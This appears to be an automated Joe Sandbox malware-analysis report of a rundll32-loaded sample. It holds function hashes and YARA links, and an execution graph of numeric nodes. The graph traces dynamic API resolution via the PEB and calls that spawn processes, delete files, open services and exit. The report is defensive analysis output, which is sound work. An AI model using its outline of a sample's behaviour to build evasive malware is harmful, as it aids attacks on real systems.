                                                                                                                      • Opcode ID: 329f67baf803e57e750ff7b4698f50556b81caf0c39a54e087e53f6ada59587b
                                                                                                                      • Instruction ID: 642a70e52bf11b7de8cb7bbdb6da5a8b8236a488639b363106a5e3ee5626d218
                                                                                                                      • Opcode Fuzzy Hash: 329f67baf803e57e750ff7b4698f50556b81caf0c39a54e087e53f6ada59587b
                                                                                                                      • Instruction Fuzzy Hash: B701B971A10118BFDF09DB74DD86AEE73B8DF04B01F0105E9EA02DB140EEB1EB448661
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10001FF0 Relevance: 5.2, APIs: 4, Instructions: 181COMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • IsBadReadPtr.KERNEL32(00000000,00000014,?,?,?,?,100025CE,00000000,00000000), ref: 10002045
                                                                                                                      • SetLastError.KERNEL32(0000007E), ref: 10002087
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorLastRead
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4100373531-0
                                                                                                                      • Opcode ID: b6f425d35b460735779e1ed3fb281948f59bf2ef0f2add24d18ae520f481b1e4
                                                                                                                      • Instruction ID: bdea880ba7c0c5bd5d2dbe714977ff7d927dc75702b615567210b407e242d671
                                                                                                                      • Opcode Fuzzy Hash: b6f425d35b460735779e1ed3fb281948f59bf2ef0f2add24d18ae520f481b1e4
                                                                                                                      • Instruction Fuzzy Hash: B181A8B4A00209EFDB04CF94C980AAEB7B1FF48354F248159E919AB355D735EE82CF94
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10020B38 Relevance: 5.1, APIs: 4, Instructions: 60COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 10020B95
                                                                                                                      • LeaveCriticalSection.KERNEL32(?,?), ref: 10020BA5
                                                                                                                      • LocalFree.KERNEL32(?), ref: 10020BAE
                                                                                                                      • TlsSetValue.KERNEL32(?,00000000), ref: 10020BC0
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CriticalSection$EnterFreeLeaveLocalValue
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2949335588-0
                                                                                                                      • Opcode ID: 6676c0264c2eb297a537204f12f4d5c162c59b7e83937d8b07f604b269a52a54
                                                                                                                      • Instruction ID: af4df8c6ab00e3b134578f48d56f113cbd39bdf93991f651abc1e22c3acb8acd
                                                                                                                      • Opcode Fuzzy Hash: 6676c0264c2eb297a537204f12f4d5c162c59b7e83937d8b07f604b269a52a54
                                                                                                                      • Instruction Fuzzy Hash: 70113435600305EFE721CF54D9C4B9AB7AAFF0A35AF508429F5528B5A2DB71F980CB50
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10020E5D Relevance: 5.0, APIs: 4, Instructions: 37COMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • EnterCriticalSection.KERNEL32(10057798,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020E99
                                                                                                                      • InitializeCriticalSection.KERNEL32(?,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020EA8
                                                                                                                      • LeaveCriticalSection.KERNEL32(10057798,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020EB5
                                                                                                                      • EnterCriticalSection.KERNEL32(?,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020EC1
                                                                                                                        • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CriticalSection$Enter$Exception@8InitializeLeaveThrow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3253506028-0
                                                                                                                      • Opcode ID: cf9bd6703211ded15ebc294ea5b4eaffa7e14a09b8c66129e44fb6711d6d5733
                                                                                                                      • Instruction ID: 3404b174272e1aedd22e2de365cf3e448d28d784c73140ac4aa41e98356ae93e
                                                                                                                      • Opcode Fuzzy Hash: cf9bd6703211ded15ebc294ea5b4eaffa7e14a09b8c66129e44fb6711d6d5733
                                                                                                                      • Instruction Fuzzy Hash: 5AF0907350031A9BDB10DB58FC88B1AB6AAFB96355F870816F64582123EB3264C48A61
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 100206C8 Relevance: 5.0, APIs: 4, Instructions: 31COMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • EnterCriticalSection.KERNEL32(100575E0,?,?,?,10020C8D,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031), ref: 100206D1
                                                                                                                      • TlsGetValue.KERNEL32 ref: 100206E6
                                                                                                                      • LeaveCriticalSection.KERNEL32(100575E0,?,?,?,10020C8D,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031), ref: 100206FC
                                                                                                                      • LeaveCriticalSection.KERNEL32(100575E0,?,?,?,10020C8D,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031), ref: 10020707
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CriticalSection$Leave$EnterValue
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3969253408-0
                                                                                                                      • Opcode ID: 384891d58c6dafcceaf36b456d2d2389f12afbb41143d91066085e81aa889ef7
                                                                                                                      • Instruction ID: 186a6cd651b3b82d4df79f5272d157dd9dcdda25cd8a7682fbe975f35e4e1d68
                                                                                                                      • Opcode Fuzzy Hash: 384891d58c6dafcceaf36b456d2d2389f12afbb41143d91066085e81aa889ef7
                                                                                                                      • Instruction Fuzzy Hash: 51F0FE76604720DFD320CF64DD8880B73ABEB8925135A9555F842D3123E630F8058F61
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Execution Graph

                                                                                                                      Execution Coverage:16.2%
                                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                                      Signature Coverage:0%
                                                                                                                      Total number of Nodes:1078
                                                                                                                      Total number of Limit Nodes:11
                                                                                                                      execution_graph 5219 426ed6 5220 426fda 5219->5220 5221 42701b 5220->5221 5222 42bb4b 2 API calls 5220->5222 5223 426ff1 5222->5223 5227 439861 5223->5227 5226 42ae03 GetPEB 5226->5221 5228 43987e 5227->5228 5229 427003 5228->5229 5231 435c4a 5228->5231 5229->5226 5232 435c66 5231->5232 5233 422d9f GetPEB 5232->5233 5234 435ceb 5233->5234 5234->5228 5173 4399aa 5174 439f06 5173->5174 5176 4412a8 GetPEB 5174->5176 5177 43a12b 5174->5177 5179 43a129 5174->5179 5180 4268de GetPEB 5174->5180 5181 434fa8 GetPEB 5174->5181 5182 433512 2 API calls 5174->5182 5183 43e938 2 API calls 5174->5183 5184 43fc96 2 API calls 5174->5184 5186 4257ce 5174->5186 5190 427519 5174->5190 5176->5174 5178 434dad 2 API calls 5177->5178 5178->5179 5180->5174 5181->5174 5182->5174 5183->5174 5184->5174 5187 4257fc 5186->5187 5188 422d9f GetPEB 5187->5188 5189 425878 5188->5189 5189->5174 5191 42752c 5190->5191 5192 422d9f GetPEB 5191->5192 5193 42759a 5192->5193 5193->5174 5194 43d3c8 5195 434fa8 GetPEB 5194->5195 5196 43d635 5195->5196 5197 43fc96 2 API calls 5196->5197 5198 43d64b 5197->5198 5199 42ab66 2 API calls 5198->5199 5206 43d6b2 5198->5206 5200 43d669 5199->5200 5201 42e7ce GetPEB 5200->5201 5202 43d692 5201->5202 5203 42ae03 GetPEB 5202->5203 5204 43d6a1 5203->5204 5205 42bab0 2 API calls 5204->5205 5205->5206 5207 42194c 5218 421973 5207->5218 5208 423bf8 GetPEB 5208->5218 5209 43baea GetPEB 5209->5218 5210 421f7e 5212 438c35 GetPEB 5210->5212 5211 42ae03 GetPEB 5211->5218 5215 421f7c 5212->5215 5213 43f7fc GetPEB 5213->5218 5214 42ab66 RtlAllocateHeap GetPEB 5214->5218 5216 42e7ce GetPEB 5216->5218 5217 421950 2 API calls 5217->5218 5218->5208 5218->5209 5218->5210 5218->5211 5218->5213 5218->5214 5218->5215 5218->5216 5218->5217 3918 43d80c 3919 43d8a5 3918->3919 3920 43d8cc 3918->3920 3924 435cf9 3919->3924 3931 436288 3924->3931 3926 43648d 3944 429700 3926->3944 3928 43648b 3928->3920 3937 433cbb 3928->3937 3931->3926 3931->3928 3932 42ab66 RtlAllocateHeap GetPEB 3931->3932 3936 42ae03 GetPEB 3931->3936 3940 43fc96 3931->3940 3954 441310 3931->3954 3958 42ea7b 3931->3958 3962 4412a8 3931->3962 3966 42e7ce 3931->3966 3970 43e35a 3931->3970 3932->3931 3936->3931 3938 422d9f GetPEB 3937->3938 3939 433d36 ExitProcess 3938->3939 3939->3920 3941 43fcac 3940->3941 3973 422d9f 3941->3973 3945 42972e 3944->3945 3946 441310 GetPEB 3945->3946 3947 429995 3946->3947 4003 43679c 3947->4003 3949 4299d1 3953 4299dc 3949->3953 4007 434dad 3949->4007 3951 4299fc 3952 434dad 2 API calls 3951->3952 3952->3953 3953->3928 3955 44132d 3954->3955 4011 423efe 3955->4011 3959 42ea9f 3958->3959 3960 422d9f GetPEB 3959->3960 3961 42eb24 SHGetFolderPathW 3960->3961 3961->3931 3963 4412c1 3962->3963 4019 4418ed 3963->4019 3967 42e7f3 3966->3967 4023 42c1dc 3967->4023 3971 422d9f GetPEB 3970->3971 3972 43e3ee 3971->3972 3972->3931 3974 422e80 lstrcmpiW 3973->3974 3975 422e5b 3973->3975 3974->3931 3979 43c761 3975->3979 3977 422e6a 3982 42f2c1 3977->3982 3986 43d374 GetPEB 3979->3986 3981 43c7f2 3981->3977 3984 42f2e7 3982->3984 3983 42f3fd 3983->3974 3984->3983 3987 42c850 3984->3987 3986->3981 3988 42c9c2 3987->3988 3995 4359b7 3988->3995 3991 42ca07 3993 42ca3a 3991->3993 3994 42f2c1 GetPEB 3991->3994 3993->3983 3994->3993 3996 4359ca 3995->3996 3997 422d9f GetPEB 3996->3997 3998 42c9ea 3997->3998 3998->3991 3999 43f949 3998->3999 4000 43f95d 3999->4000 4001 422d9f GetPEB 4000->4001 4002 43f9d5 4001->4002 4002->3991 4004 4367d5 4003->4004 4005 422d9f GetPEB 4004->4005 4006 436847 CreateProcessW 4005->4006 4006->3949 4008 434dc4 4007->4008 4009 422d9f GetPEB 4008->4009 4010 434e57 CloseHandle 4009->4010 4010->3951 4012 423f17 4011->4012 4015 423cd1 4012->4015 4016 423cec 4015->4016 4017 422d9f GetPEB 4016->4017 4018 423d79 4017->4018 4018->3931 4020 441910 4019->4020 4021 422d9f GetPEB 4020->4021 4022 441306 4021->4022 4022->3931 4024 422d9f GetPEB 4023->4024 4025 42c243 4024->4025 4025->3931 4026 43c82c 4031 441b54 4026->4031 4028 43c8a7 4029 433cbb 2 API calls 4028->4029 4030 43c8b7 4029->4030 4065 442dac 4031->4065 4046 44365e 4281 423fb8 4046->4281 4053 4268de GetPEB 4053->4065 4055 442e25 4055->4028 4057 43eae6 RtlAllocateHeap GetPEB 4057->4065 4060 442e0a 4138 439186 4060->4138 4061 42ebf2 RtlAllocateHeap GetPEB 4061->4065 4065->4046 4065->4053 4065->4055 4065->4057 4065->4060 4065->4061 4067 42ae03 GetPEB 4065->4067 4068 43b391 4065->4068 4079 432bf6 4065->4079 4092 42f93d 4065->4092 4102 4374dd 4065->4102 4116 43be8c 4065->4116 4124 430f7b 4065->4124 4128 4270ed 4065->4128 4148 42e243 4065->4148 4158 426083 4065->4158 4168 42b186 4065->4168 4173 4283a1 4065->4173 4176 434b56 4065->4176 4182 42911a 4065->4182 4194 43d8d7 4065->4194 4206 425e0b 4065->4206 4210 42c309 4065->4210 4219 43129c 4065->4219 4226 42ae9a 4065->4226 4231 426c29 4065->4231 4236 43ebff 4065->4236 4245 4304b8 4065->4245 4252 42c24a 4065->4252 4256 422830 4065->4256 4267 42fd8c 4065->4267 4271 42b821 4065->4271 4278 42f435 4065->4278 4067->4065 4076 43b793 4068->4076 4070 43b988 4073 434dad 2 API calls 4070->4073 4071 43b986 4071->4065 4073->4071 4076->4070 4076->4071 4077 42e7ce GetPEB 4076->4077 4296 425d65 4076->4296 4300 43e938 4076->4300 4304 42ab66 4076->4304 4308 42ae03 4076->4308 4312 43bbb2 4076->4312 4077->4076 4085 433273 4079->4085 4080 42ab66 2 API calls 4080->4085 4083 433400 4086 43e689 2 API calls 4083->4086 4084 42ea7b 2 API calls 4084->4085 4085->4080 4085->4083 4085->4084 4087 43341c 4085->4087 4091 42ae03 GetPEB 4085->4091 4338 43ee94 4085->4338 4349 430188 4085->4349 4353 42eb36 4085->4353 4357 43e689 4085->4357 4361 43bdb5 4085->4361 4086->4087 4087->4065 4091->4085 4094 42fc5c 4092->4094 4093 42fd67 4398 43e498 4093->4398 4094->4093 4096 42fd65 4094->4096 4098 4412a8 GetPEB 4094->4098 4099 42ab66 2 API calls 4094->4099 4100 42e7ce GetPEB 4094->4100 4101 42ae03 GetPEB 4094->4101 4384 428d95 4094->4384 4096->4065 4098->4094 4099->4094 4100->4094 4101->4094 4103 4379ea 4102->4103 4104 433512 RtlAllocateHeap GetPEB 4103->4104 4106 437b7e 4103->4106 4108 437b5f 4103->4108 4111 42ab66 2 API calls 4103->4111 4112 437b5d 4103->4112 4115 42ae03 GetPEB 4103->4115 4424 430eda 4103->4424 4428 42c795 4103->4428 4104->4103 4107 4268de GetPEB 4106->4107 4110 437b99 4107->4110 4432 427027 4108->4432 4113 4268de GetPEB 4110->4113 4111->4103 4112->4065 4113->4112 4115->4103 4119 43c16a 4116->4119 4118 43bbb2 GetPEB 4118->4119 4119->4118 4120 43e938 2 API calls 4119->4120 4121 434dad 2 API calls 4119->4121 4122 43c297 4119->4122 4123 4412a8 GetPEB 4119->4123 4436 43bc49 4119->4436 4120->4119 4121->4119 4122->4065 4123->4119 4125 430f95 4124->4125 4126 431099 4125->4126 4127 42ec9b RtlAllocateHeap GetPEB LoadLibraryW 4125->4127 4126->4065 4127->4125 4131 4273a5 4128->4131 4130 42ea7b 2 API calls 4130->4131 4131->4130 4132 42eb36 2 API calls 4131->4132 4133 43e689 2 API calls 4131->4133 4134 4274d5 4131->4134 4136 433512 2 API calls 4131->4136 4137 4274d3 4131->4137 4440 42e86a 4131->4440 4132->4131 4133->4131 4135 4412a8 GetPEB 4134->4135 4135->4137 4136->4131 4137->4065 4146 4391a1 4138->4146 4139 42ea7b 2 API calls 4139->4146 4140 43981f 4142 429700 3 API calls 4140->4142 4141 42ab66 RtlAllocateHeap GetPEB 4141->4146 4143 4396a3 4142->4143 4143->4055 4144 43bdb5 GetPEB 4144->4146 4146->4139 4146->4140 4146->4141 4146->4143 4146->4144 4147 42ae03 GetPEB 4146->4147 4451 425f83 4146->4451 4147->4146 4155 42e562 4148->4155 4150 42e702 4470 42fff2 4150->4470 4152 43e35a GetPEB 4152->4155 4154 42e700 4154->4065 4155->4150 4155->4152 4155->4154 4156 4268de GetPEB 4155->4156 4455 42f4bd 4155->4455 4459 43561f 4155->4459 4466 42bc8a 4155->4466 4156->4155 4159 4260b9 4158->4159 4163 4268c5 4159->4163 4164 441310 GetPEB 4159->4164 4167 4268de GetPEB 4159->4167 4478 432753 4159->4478 4488 436864 4159->4488 4506 421f9b 4159->4506 4516 42bd0f 4159->4516 4525 437bca 4159->4525 4163->4065 4164->4159 4167->4159 4688 44074a 4168->4688 4174 425e0b GetPEB 4173->4174 4175 428405 4174->4175 4175->4065 4178 434c7f 4176->4178 4179 434d5e 4178->4179 4695 434fa8 4178->4695 4699 42c706 4178->4699 4702 441993 4178->4702 4179->4065 4185 429139 4182->4185 4183 433512 2 API calls 4183->4185 4185->4183 4189 4295bc 4185->4189 4740 426a1f 4185->4740 4747 435040 4185->4747 4755 43a429 4185->4755 4767 42472e 4185->4767 4788 422fa1 4185->4788 4809 427b82 4185->4809 4821 430946 4185->4821 4829 4288f4 4185->4829 4189->4065 4204 43e021 4194->4204 4195 43ba68 GetPEB 4195->4204 4196 42ea7b 2 API calls 4196->4204 4198 43e28e 4954 427af8 4198->4954 4201 43e28c 4201->4065 4202 42ab66 RtlAllocateHeap GetPEB 4202->4204 4203 43bdb5 GetPEB 4203->4204 4204->4195 4204->4196 4204->4198 4204->4201 4204->4202 4204->4203 4205 42ae03 GetPEB 4204->4205 4946 428786 4204->4946 4950 43c2ce 4204->4950 4205->4204 4207 425e24 4206->4207 4208 422d9f GetPEB 4207->4208 4209 425ea8 4208->4209 4209->4065 4216 42c589 4210->4216 4211 42c651 4958 421950 4211->4958 4212 42c64f 4212->4065 4214 434fa8 GetPEB 4214->4216 4215 42ab66 2 API calls 4215->4216 4216->4211 4216->4212 4216->4214 4216->4215 4217 42e7ce GetPEB 4216->4217 4218 42ae03 GetPEB 4216->4218 4217->4216 4218->4216 4222 4312be 4219->4222 4220 431758 4221 43f88f GetPEB 4220->4221 4223 431756 4221->4223 4222->4220 4222->4223 4224 43f88f GetPEB 4222->4224 4225 433512 2 API calls 4222->4225 4223->4065 4224->4222 4225->4222 4228 42afb9 4226->4228 4229 42aff1 4228->4229 4982 423d8a 4228->4982 4986 435a5c 4228->4986 4229->4065 4232 426d2b 4231->4232 4234 426d76 4232->4234 4235 433512 2 API calls 4232->4235 4990 43a156 4232->4990 4234->4065 4235->4232 4244 43ec1b 4236->4244 4238 43ede9 4239 4268de GetPEB 4238->4239 4242 43ede7 4239->4242 4240 433512 2 API calls 4240->4244 4242->4065 4244->4238 4244->4240 4244->4242 5023 440d5b 4244->5023 5033 43ee11 4244->5033 5037 426d80 4244->5037 4247 430740 4245->4247 4246 43e689 GetPEB CloseServiceHandle 4246->4247 4247->4246 4248 430896 4247->4248 4249 422e96 2 API calls 4247->4249 4250 42eb36 2 API calls 4247->4250 5133 42c67d 4247->5133 4248->4065 4249->4247 4250->4247 4253 42c263 4252->4253 4254 422d9f GetPEB 4253->4254 4255 42c2fe 4254->4255 4255->4065 4257 44074a GetPEB 4256->4257 4266 422c36 4257->4266 4258 422d70 4260 428d95 2 API calls 4258->4260 4259 422d6e 4259->4065 4260->4259 4261 42ab66 RtlAllocateHeap GetPEB 4261->4266 4262 425ae2 GetPEB 4262->4266 4263 42e7ce GetPEB 4263->4266 4264 43d37b GetPEB 4264->4266 4265 42ae03 GetPEB 4265->4266 4266->4258 4266->4259 4266->4261 4266->4262 4266->4263 4266->4264 4266->4265 4269 42ff04 4267->4269 4268 425ae2 GetPEB 4268->4269 4269->4268 4270 42ffeb 4269->4270 4270->4065 4275 42b981 4271->4275 4272 433512 2 API calls 4272->4275 4273 42b9dc 4274 434eff GetPEB 4273->4274 4276 42b9da 4274->4276 4275->4272 4275->4273 4275->4276 5137 4311fc 4275->5137 4276->4065 4279 433512 2 API calls 4278->4279 4280 42f4a9 4279->4280 4280->4065 4286 42436c 4281->4286 4282 42ab66 2 API calls 4282->4286 4284 42e7ce GetPEB 4284->4286 4286->4282 4286->4284 4287 4304b8 4 API calls 4286->4287 4288 4243a0 4286->4288 4289 42ae03 GetPEB 4286->4289 4290 428d95 2 API calls 4286->4290 4292 4244f5 4286->4292 5145 4244fa 4286->5145 5152 4341a7 4286->5152 4287->4286 4291 434fa8 GetPEB 4288->4291 4289->4286 4290->4286 4293 4243b8 4291->4293 4292->4292 5141 425b6b 4293->5141 4297 425d87 4296->4297 4298 422d9f GetPEB 4297->4298 4299 425df9 SetFileInformationByHandle 4298->4299 4299->4076 4301 43e968 4300->4301 4302 422d9f GetPEB 4301->4302 4303 43e9d0 CreateFileW 4302->4303 4303->4076 4305 42ab80 4304->4305 4316 433512 4305->4316 4309 42ae16 4308->4309 4328 4268de 4309->4328 4313 43bbc2 4312->4313 4314 422d9f GetPEB 4313->4314 4315 43bc3d 4314->4315 4315->4076 4321 435bb3 4316->4321 4320 42ac0f 4320->4076 4322 422d9f GetPEB 4321->4322 4323 43361f 4322->4323 4324 427a47 4323->4324 4325 427a66 4324->4325 4326 422d9f GetPEB 4325->4326 4327 427ae7 RtlAllocateHeap 4326->4327 4327->4320 4329 4268f4 4328->4329 4330 435bb3 GetPEB 4329->4330 4331 426a03 4330->4331 4334 4340f4 4331->4334 4335 434111 4334->4335 4336 422d9f GetPEB 4335->4336 4337 426a18 4336->4337 4337->4076 4340 43eec0 4338->4340 4339 433512 RtlAllocateHeap GetPEB 4339->4340 4340->4339 4343 43f7f1 4340->4343 4344 4268de GetPEB 4340->4344 4348 43e689 2 API calls 4340->4348 4365 422e96 4340->4365 4369 4295c9 4340->4369 4373 438cd6 4340->4373 4377 43e9e9 4340->4377 4381 425ae2 4340->4381 4343->4085 4344->4340 4348->4340 4350 4301cf 4349->4350 4351 422d9f GetPEB 4350->4351 4352 430244 4351->4352 4352->4085 4354 42eb4e 4353->4354 4355 422d9f GetPEB 4354->4355 4356 42ebe2 OpenSCManagerW 4355->4356 4356->4085 4358 43e69f 4357->4358 4359 422d9f GetPEB 4358->4359 4360 43e707 CloseServiceHandle 4359->4360 4360->4085 4362 43bde0 4361->4362 4363 42c1dc GetPEB 4362->4363 4364 43be03 4363->4364 4364->4085 4366 422eb2 4365->4366 4367 422d9f GetPEB 4366->4367 4368 422f22 OpenServiceW 4367->4368 4368->4340 4370 4295f4 4369->4370 4371 422d9f GetPEB 4370->4371 4372 42966f 4371->4372 4372->4340 4374 438cf2 4373->4374 4375 422d9f GetPEB 4374->4375 4376 438d61 4375->4376 4376->4340 4378 43ea28 4377->4378 4379 422d9f GetPEB 4378->4379 4380 43eaa8 4379->4380 4380->4340 4382 422d9f GetPEB 4381->4382 4383 425b62 4382->4383 4383->4340 4385 428db0 4384->4385 4386 441310 GetPEB 4385->4386 4387 429069 4386->4387 4388 441310 GetPEB 4387->4388 4389 429085 4388->4389 4390 441310 GetPEB 4389->4390 4391 4290a1 4390->4391 4408 4308a0 4391->4408 4394 4308a0 GetPEB 4395 4290d4 4394->4395 4412 43e2c5 4395->4412 4397 42910d 4397->4094 4399 43e4b0 4398->4399 4400 42ab66 2 API calls 4399->4400 4401 43e63f 4400->4401 4416 423bf8 4401->4416 4404 42ae03 GetPEB 4405 43e66f 4404->4405 4420 42bab0 4405->4420 4407 43e680 4407->4096 4409 4308b9 4408->4409 4410 422d9f GetPEB 4409->4410 4411 4290bc 4410->4411 4411->4394 4413 43e2d8 4412->4413 4414 422d9f GetPEB 4413->4414 4415 43e34e SHFileOperationW 4414->4415 4415->4397 4417 423c17 4416->4417 4418 42c1dc GetPEB 4417->4418 4419 423c33 4418->4419 4419->4404 4421 42bac3 4420->4421 4422 422d9f GetPEB 4421->4422 4423 42bb40 DeleteFileW 4422->4423 4423->4407 4425 430efc 4424->4425 4426 422d9f GetPEB 4425->4426 4427 430f65 4426->4427 4427->4103 4429 42c7b4 4428->4429 4430 422d9f GetPEB 4429->4430 4431 42c83b 4430->4431 4431->4103 4433 42703d 4432->4433 4434 422d9f GetPEB 4433->4434 4435 4270b2 4434->4435 4435->4112 4437 43bc6a 4436->4437 4438 422d9f GetPEB 4437->4438 4439 43bcee 4438->4439 4439->4119 4444 42e9ac 4440->4444 4441 42ea4f 4443 4308a0 GetPEB 4441->4443 4445 42ea4d 4443->4445 4444->4441 4444->4445 4446 4412a8 GetPEB 4444->4446 4447 43ba68 4444->4447 4445->4131 4446->4444 4448 43ba7e 4447->4448 4449 422d9f GetPEB 4448->4449 4450 43bade 4449->4450 4450->4444 4452 425fb4 4451->4452 4453 42c1dc GetPEB 4452->4453 4454 425fda 4453->4454 4454->4146 4456 42f4d9 4455->4456 4457 422d9f GetPEB 4456->4457 4458 42f533 4457->4458 4458->4155 4462 435636 4459->4462 4460 433512 2 API calls 4460->4462 4461 43596d 4463 42b267 GetPEB 4461->4463 4462->4460 4462->4461 4465 43596b 4462->4465 4474 42b267 4462->4474 4463->4465 4465->4155 4467 42bca3 4466->4467 4468 422d9f GetPEB 4467->4468 4469 42bd00 4468->4469 4469->4155 4471 430005 4470->4471 4472 422d9f GetPEB 4471->4472 4473 430094 4472->4473 4473->4154 4475 42b29a 4474->4475 4476 422d9f GetPEB 4475->4476 4477 42b31d 4476->4477 4477->4462 4486 432a6a 4478->4486 4479 432bb6 4479->4159 4481 433512 2 API calls 4481->4486 4482 432bb8 4483 4268de GetPEB 4482->4483 4483->4479 4484 42ab66 2 API calls 4484->4486 4485 42c1dc GetPEB 4485->4486 4486->4479 4486->4481 4486->4482 4486->4484 4486->4485 4487 42ae03 GetPEB 4486->4487 4544 43c9a9 4486->4544 4487->4486 4500 4370f5 4488->4500 4489 433512 RtlAllocateHeap GetPEB 4489->4500 4492 43744f 4495 42bb4b 2 API calls 4492->4495 4494 42ab66 2 API calls 4494->4500 4498 43746e 4495->4498 4496 437144 4499 4268de GetPEB 4496->4499 4497 42c1dc GetPEB 4497->4500 4561 42f060 4498->4561 4502 437163 4499->4502 4500->4489 4500->4492 4500->4494 4500->4496 4500->4497 4500->4502 4505 42ae03 GetPEB 4500->4505 4549 42bb4b 4500->4549 4553 42f545 4500->4553 4557 43fd29 4500->4557 4502->4159 4504 42ae03 GetPEB 4504->4502 4505->4500 4515 421fdb 4506->4515 4508 433512 2 API calls 4508->4515 4510 43fd29 GetPEB 4510->4515 4512 422823 4512->4159 4514 4268de GetPEB 4514->4515 4515->4508 4515->4510 4515->4512 4515->4514 4569 4345cd 4515->4569 4576 43fa99 4515->4576 4580 431831 4515->4580 4596 43ff31 4515->4596 4518 42bd31 4516->4518 4520 42c013 4518->4520 4521 433512 2 API calls 4518->4521 4522 42bffa 4518->4522 4524 43fd29 GetPEB 4518->4524 4627 43cc89 4518->4627 4634 4364f1 4518->4634 4520->4159 4520->4520 4521->4518 4523 4268de 